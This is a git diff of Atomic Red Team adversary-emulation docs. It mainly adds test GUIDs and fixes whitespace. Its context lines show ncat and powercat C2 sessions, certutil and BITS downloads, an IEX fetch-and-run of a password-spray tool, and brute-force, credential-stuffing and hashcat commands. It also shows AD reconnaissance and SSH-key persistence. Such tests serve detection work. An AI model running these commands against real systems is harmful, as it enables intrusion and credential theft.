## Atomic Test #2 - Enumerate all accounts via PowerShell (Domain) -Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. +auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2 + +Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. **Supported Platforms:** Windows @@ -82,15 +86,17 @@ get-aduser -filter *
## Atomic Test #3 - Enumerate logged on users via CMD (Domain) -Enumerate logged on users. Upon exeuction, logged on users will be displayed. +auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7 + +Enumerate logged on users. Upon exeuction, logged on users will be displayed. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Name of remote system to query | String | $env:COMPUTERNAME| @@ -111,16 +117,18 @@ query user /SERVER:#{computer_name}
## Atomic Test #4 - Automated AD Recon (ADRecon) + +auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 + ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adrecon_path | Path of ADRecon.ps1 file | Path | $env:TEMP\ADRecon.ps1| @@ -144,7 +152,7 @@ Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report- ##### Description: ADRecon must exist on disk at specified location (#{adrecon_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} +if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -158,16 +166,18 @@ Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRe
## Atomic Test #5 - Adfind -Listing password policy + +auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600 + Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -186,7 +196,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://social.techne ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -200,16 +210,18 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #6 - Adfind - Enumerate Active Directory Admins + +auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -228,7 +240,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -242,16 +254,18 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #7 - Adfind - Enumerate Active Directory User Objects + +auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -270,7 +284,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -284,16 +298,18 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects + +auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99 + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -312,7 +328,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -326,8 +342,10 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #9 - Enumerate Default Domain Admin Details (Domain) -This test will enumerate the details of the built-in domain admin account +auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef + +This test will enumerate the details of the built-in domain admin account **Supported Platforms:** Windows @@ -350,18 +368,20 @@ net user administrator /domain
## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation + +auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b + Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Domain FQDN | String | contoso.com| | uac_prop | UAC Property to search | String | 524288| @@ -387,7 +407,7 @@ Try { } Catch { exit 1 -} +} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1090.001/T1090.001.md b/atomics/T1090.001/T1090.001.md index 3559cb9e..ba88f77c 100644 --- a/atomics/T1090.001/T1090.001.md +++ b/atomics/T1090.001/T1090.001.md @@ -16,17 +16,19 @@ By using a compromised internal system as a proxy, adversaries may conceal the t
## Atomic Test #1 - Connection Proxy + +auto_generated_guid: 0ac21132-4485-4212-a681-349e8a6637cd + Enable traffic redirection. Note that this test may conflict with pre-existing system configuration. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080| | proxy_scheme | Protocol to proxy (http or https) | string | http| @@ -53,18 +55,20 @@ unset https_proxy
## Atomic Test #2 - Connection Proxy for macOS UI + +auto_generated_guid: 648d68c1-8bcd-4486-9abe-71c6655b6a2c + Enable traffic redirection on macOS UI (not terminal). The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. Note that this test may conflict with pre-existing system configuration. - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | proxy_server | Proxy server URL (host) | string | 127.0.0.1| | proxy_port | Proxy server port | string | 8080| @@ -93,17 +97,19 @@ networksetup -setsecurewebproxystate #{interface} off
## Atomic Test #3 - portproxy reg key + +auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a + Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 Upon execution there will be a new proxy entry in netsh netsh interface portproxy show all - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | connectaddress | Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer. | string | 127.0.0.1| | connectport | Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer. | string | 1337| diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md index 625bd04f..35f06246 100644 --- a/atomics/T1095/T1095.md +++ b/atomics/T1095/T1095.md @@ -17,16 +17,18 @@ ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Ev
## Atomic Test #1 - ICMP C2 + +auto_generated_guid: 0268e63c-e244-42db-bef7-72a9e59fc1fc + This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | The IP address of the listening server | string | 127.0.0.1| @@ -48,17 +50,19 @@ Invoke-PowerShellIcmp -IPAddress #{server_ip}
## Atomic Test #2 - Netcat C2 + +auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 + Start C2 Session Using Ncat To start the listener on a Linux device, type the following: nc -l -p - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_port | The port for the C2 connection | integer | 80| | ncat_exe | The location of ncat.exe | path | $env:TEMP\T1095\nmap-7.80\ncat.exe| @@ -80,7 +84,7 @@ cmd /c #{ncat_exe} #{server_ip} #{server_port} ##### Description: ncat.exe must be available at specified location (#{ncat_exe}) ##### Check Prereq Commands: ```powershell -if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} +if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -102,17 +106,19 @@ if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\
## Atomic Test #3 - Powercat C2 + +auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e + Start C2 Session Using Powercat To start the listener on a Linux device, type the following: nc -l -p - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | The IP address or domain name of the listening server | string | 127.0.0.1| | server_port | The port for the C2 connection | integer | 80| diff --git a/atomics/T1098.004/T1098.004.md b/atomics/T1098.004/T1098.004.md index 10dae2f0..6aefc212 100644 --- a/atomics/T1098.004/T1098.004.md +++ b/atomics/T1098.004/T1098.004.md @@ -12,9 +12,11 @@ Adversaries may modify SSH authorized_keys files directly with scri
## Atomic Test #1 - Modify SSH Authorized Keys + +auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc + Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file. - **Supported Platforms:** macOS, Linux diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index 221f8feb..b4409385 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -12,8 +12,10 @@
## Atomic Test #1 - Admin Account Manipulate -Manipulate Admin Account Name +auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af + +Manipulate Admin Account Name **Supported Platforms:** Windows @@ -62,6 +64,9 @@ foreach($u in $list) {
## Atomic Test #2 - Domain Account and Group Manipulate + +auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 + Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively, @@ -74,14 +79,13 @@ service account whose delegation is given onto a dedicated OU for user creation as group manager of the target group. Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }` - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | account_prefix | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. | String | atr-| @@ -121,7 +125,7 @@ Try { } Catch { exit 1 -} +} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 342c71e0..4003a30d 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -36,15 +36,17 @@
## Atomic Test #1 - rsync remote file copy (push) -Utilize rsync to perform a remote file copy (push) +auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 + +Utilize rsync to perform a remote file copy (push) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_path | Remote path to receive rsync | Path | /tmp/victim-files| | remote_host | Remote host to copy toward | String | victim-host| @@ -68,15 +70,17 @@ rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
## Atomic Test #2 - rsync remote file copy (pull) -Utilize rsync to perform a remote file copy (pull) +auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f + +Utilize rsync to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_path | Path of folder to copy | Path | /tmp/adversary-rsync/| | remote_host | Remote host to copy from | String | adversary-host| @@ -100,15 +104,17 @@ rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
## Atomic Test #3 - scp remote file copy (push) -Utilize scp to perform a remote file copy (push) +auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 + +Utilize scp to perform a remote file copy (push) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_path | Remote path to receive scp | Path | /tmp/victim-files/| | local_file | Path of file to copy | Path | /tmp/adversary-scp| @@ -132,15 +138,17 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path}
## Atomic Test #4 - scp remote file copy (pull) -Utilize scp to perform a remote file copy (pull) +auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 + +Utilize scp to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive scp | Path | /tmp/victim-files/| @@ -164,15 +172,17 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path}
## Atomic Test #5 - sftp remote file copy (push) -Utilize sftp to perform a remote file copy (push) +auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e + +Utilize sftp to perform a remote file copy (push) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_path | Remote path to receive sftp | Path | /tmp/victim-files/| | local_file | Path of file to copy | Path | /tmp/adversary-sftp| @@ -196,15 +206,17 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
## Atomic Test #6 - sftp remote file copy (pull) -Utilize sftp to perform a remote file copy (pull) +auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef + +Utilize sftp to perform a remote file copy (pull) **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive sftp | Path | /tmp/victim-files/| @@ -228,15 +240,17 @@ sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
## Atomic Test #7 - certutil download (urlcache) -Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! +auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 + +Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| @@ -262,15 +276,17 @@ del #{local_path} >nul 2>&1
## Atomic Test #8 - certutil download (verifyctl) -Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! +auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b + +Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| @@ -300,16 +316,18 @@ Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorActi
## Atomic Test #9 - Windows - BITSAdmin BITS Download + +auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b + This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bits_job_name | Name of the created BITS job | String | qcxjb7| | local_path | Local path to place file | Path | %temp%\Atomic-license.txt| @@ -332,16 +350,18 @@ C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{re
## Atomic Test #10 - Windows - PowerShell Download + +auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 + This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | destination_path | Destination path to file | Path | $env:TEMP\Atomic-license.txt| @@ -367,15 +387,17 @@ Remove-Item #{destination_path} -Force -ErrorAction Ignore
## Atomic Test #11 - OSTAP Worming Activity -OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. +auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad + +OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | destination_path | Path to create remote file at. Default is local admin share. | String | \\localhost\C$| @@ -401,9 +423,11 @@ popd
## Atomic Test #12 - svchost writing a file to a UNC path + +auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f + svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file. - **Supported Platforms:** Windows @@ -432,19 +456,21 @@ del C:\\svchost.exe >nul 2>&1
## Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe + +auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc + Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory. More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Location to save downloaded file | path | %temp%\Atomic-license.txt| @@ -474,7 +500,7 @@ $retVal = 1 foreach ($version in @("4.18.2007.8-0","4.18.2007.9","4.18.2009.9")){ if (Test-Path "$env:ProgramData\Microsoft\Windows Defender\Platform\$version") { $retVal = 0} } -exit $retVal +exit $retVal ``` ##### Get Prereq Commands: ```powershell @@ -488,15 +514,17 @@ Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 m
## Atomic Test #14 - whois file download -Download a remote file using the whois utility +auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab + +Download a remote file using the whois utility **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_host | Remote hostname or IP address | String | localhost| | remote_port | Remote port to connect to | Integer | 8443| @@ -523,7 +551,7 @@ rm -f #{output_file} ##### Description: The whois and timeout commands must be present ##### Check Prereq Commands: ```sh -which whois && which timeout +which whois && which timeout ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1106/T1106.md b/atomics/T1106/T1106.md index 6e9899b7..4f7c9b48 100644 --- a/atomics/T1106/T1106.md +++ b/atomics/T1106/T1106.md @@ -16,15 +16,17 @@ Adversaries may abuse these native API functions as a means of executing behavio
## Atomic Test #1 - Execution through API - CreateProcess -Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt. +auto_generated_guid: 99be2089-c52d-4a4a-b5c3-261ee42c8b62 + +Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | source_file | Location of the CSharp source file to compile and execute | Path | PathToAtomicsFolder\T1106\src\CreateProcess.cs| | output_file | Location of the payload | Path | %tmp%\T1106.exe| diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index c92a2e31..c62f01f1 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -33,15 +33,17 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
## Atomic Test #1 - Brute Force Credentials of all domain users via SMB -Creates username and password files then attempts to brute force on remote host +auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224 + +Creates username and password files then attempts to brute force on remote host **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt| | input_file_passwords | Path to a file containing a list of passwords we will attempt to brute force with | Path | passwords.txt| @@ -69,15 +71,17 @@ echo "Password!" >> #{input_file_passwords}
## Atomic Test #2 - Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) -Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos +auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 + +Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user | Account to bruteforce | String | bruce.wayne| | passwords | List of passwords we will attempt to brute force with | String | Password1`n1q2w3e4r`nPassword!| diff --git a/atomics/T1110.002/T1110.002.md b/atomics/T1110.002/T1110.002.md index d2184605..7157b87b 100644 --- a/atomics/T1110.002/T1110.002.md +++ b/atomics/T1110.002/T1110.002.md @@ -10,15 +10,17 @@
## Atomic Test #1 - Password Cracking with Hashcat -Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against +auto_generated_guid: 6d27df5d-69d4-4c91-bc33-5983ffe91692 + +Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | hashcat_exe | Path to Hashcat executable | String | %temp%\hashcat6\hashcat-6.1.1\hashcat.exe| | input_file_sam | Path to SAM file | string | PathToAtomicsFolder\T1110.002\src\sam.txt| @@ -47,7 +49,7 @@ del %temp%\hashcat-unzip /Q /S >nul 2>&1 ##### Description: Hashcat must exist on disk at specified location (#{hashcat_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1} +if (Test-Path $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md index 5b71930e..b5cb5bd3 100644 --- a/atomics/T1110.003/T1110.003.md +++ b/atomics/T1110.003/T1110.003.md @@ -33,18 +33,20 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
## Atomic Test #1 - Password Spray all Domain Users + +auto_generated_guid: 90bc2e54-6c84-47a5-9439-0a2a92b4b175 + CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently. This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt. See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5 - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | password | The password to try for each user in users.txt | string | Spring2020| @@ -63,7 +65,7 @@ See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne f ##### Description: List of domain users to password spray must exits at %temp%\users.txt ##### Check Prereq Commands: ```cmd -if not exist %temp%\users.txt (exit /b 1) +if not exist %temp%\users.txt (exit /b 1) ``` ##### Get Prereq Commands: ```cmd @@ -77,17 +79,19 @@ PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
## Atomic Test #2 - Password Spray (DomainPasswordSpray) + +auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b + Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain https://github.com/dafthack/DomainPasswordSpray - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Domain to brute force against | String | (Get-ADDomain | Select-Object -ExpandProperty Name)| @@ -109,17 +113,19 @@ IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb725
## Atomic Test #3 - Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) + +auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d + Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | password | single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) | String | P@ssw0rd!| | domain | Domain FQDN | String | contoso.com| diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md index 54dcd9de..8f7114b7 100644 --- a/atomics/T1110.004/T1110.004.md +++ b/atomics/T1110.004/T1110.004.md @@ -31,15 +31,17 @@ In addition to management services, adversaries may "target single sign-on (SSO)
## Atomic Test #1 - SSH Credential Stuffing From Linux -Using username,password combination from a password dump to login over SSH. +auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad + +Using username,password combination from a password dump to login over SSH. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_host | IP Address / Hostname you want to target. | String | localhost| @@ -59,7 +61,7 @@ for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepas ##### Description: Requires SSHPASS ##### Check Prereq Commands: ```bash -if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; +if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -73,15 +75,17 @@ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | g
